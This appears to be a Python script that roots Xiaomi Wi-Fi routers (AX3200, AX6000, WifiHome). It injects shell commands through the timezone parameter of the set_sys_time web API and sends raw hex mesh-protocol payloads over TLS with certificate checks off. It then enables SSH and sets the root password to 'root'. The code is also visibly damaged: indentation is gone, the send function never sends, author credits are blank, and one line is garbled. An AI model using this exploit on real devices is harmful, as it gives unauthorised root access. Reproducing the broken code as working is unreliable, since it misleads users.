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#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import types
import platform
import ctypes
import binascii
import re
import requests
import urllib
import json
import xmir_base
from gateway import *
# Devices:
# RB01 FW any AX3200
# RB06 FW any Redmi AX6000
# RB08 FW any WifiHome
gw = Gateway(timeout = 4, detect_ssh = False)
if gw.status < 1:
die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
print("device_name =", gw.device_name)
print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
print("mac address = {}".format(gw.mac_address))
dn = gw.device_name
gw.ssh_port = 22
ret = gw.detect_ssh(verbose = 1, interactive = True)
if ret > 0:
die(0, "SSH server already installed and running")
info = gw.get_init_info()
if not info or info["code"] != 0:
die('Cannot get init_info')
ccode = info["countrycode"]
if ccode == "CN":
print('Current CountryCode = CN')
stok = gw.web_login()
def exec_cmd(cmd = {}, api = 'misystem/set_sys_time'):
params = cmd
if isinstance(cmd, str):
params = { 'timezone': " ' ; " + cmd + " ; " }
res = requests.get(gw.apiurl + api, params = params)
return res.text
def get_netmode():
res = exec_cmd(api = 'xqnetwork/get_netmode')
if '"code":0' in res:
dp = json.loads(res)
return int(dp["netmode"])
return -1
netmode = get_netmode()
if netmode < 0:
die('Extension "/api/xqnetwork/get_netmode" not working!')
if netmode != 4:
print(f"netmode = {netmode}. Attempting to set netmode to 4 ...")
import ssl
import socket
# Create an SSL context object and configure it for the client
sslctx = ssl.create_default_context()
sslctx.check_hostname = False
sslctx.verify_mode = ssl.CERT_NONE
# Create a TCP socket object
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Wrap the socket with SSL encryption using the context object
sock = sslctx.wrap_socket(tcp_sock, server_hostname = gw.ip_addr)
# Connect to the server
mesh_port = 19553
sock.connect( (gw.ip_addr, mesh_port) )
def ssl_raw_send(ssl_sock, hex_string, recv_size=2048):
byte_string = bytes.fromhex(hex_string)
response = ssl_sock.recv(recv_size)
return response
# Mesh Exploit source and author:
# and
resp = ssl_raw_send(sock,'100100a3000438633a64653a66393a62663a35643a6236000038633a64653a66393a62663a35643a6237000061646435353662636461303730380000503151527567767a6d78746b35502f70316b2b46566a724a4c716d6568494546424a6563477062516a76383d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000033433a43443a35373a32323a31433a36310000')
resp = ssl_raw_send(sock,'10010020000538633a64653a66393a62663a35643a6236000038633a64653a66393a62663a35643a623700000100000000000000000000000000000000000000000000000000000000000000')
resp = ssl_raw_send(sock,'10010020000738633a64653a66393a62663a35643a6236000038633a64653a66393a62663a35643a62370000017265637620636f6e6669672073796e6320636f72726563746c792e0a000000')
netmode = -1
for i in range(7, 0, -1):
netmode = get_netmode()
if netmode < 0:
die('Extension "/api/xqnetwork/get_netmode" not working!')
if netmode == 4:
print(f'Forced "whc_cap" mode enabled! (netmode=4)')
if netmode != 4:
print(f"netmode = {netmode}")
die('It is necessary to reorganize the device into "whc_cap" mode! (Required netmode=4)')
#res = exec_cmd('logger hello_world_3335556_')
res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
if '"code":0' not in res:
die('Exploit not working!!!')
#res = exec_cmd("sed -i 's/`nvram get ssh_en`/1/g' /etc/init.d/dropbear")
res = exec_cmd("nvram set ssh_en=1; nvram set boot_wait=on; nvram set bootdelay=3; nvram commit")
res = exec_cmd("(echo root; sleep 1; echo root) | passwd root")
res = exec_cmd("/etc/init.d/dropbear enable")
print('Run SSH server on port 22 ...')
res = exec_cmd("/etc/init.d/dropbear restart")
res = exec_cmd("logger -t XMiR ___completed___")
gw.use_ssh = True
gw.passw = 'root' = 10) # RSA host key generate slowly!
print('#### SSH and Telnet services are activated! ####')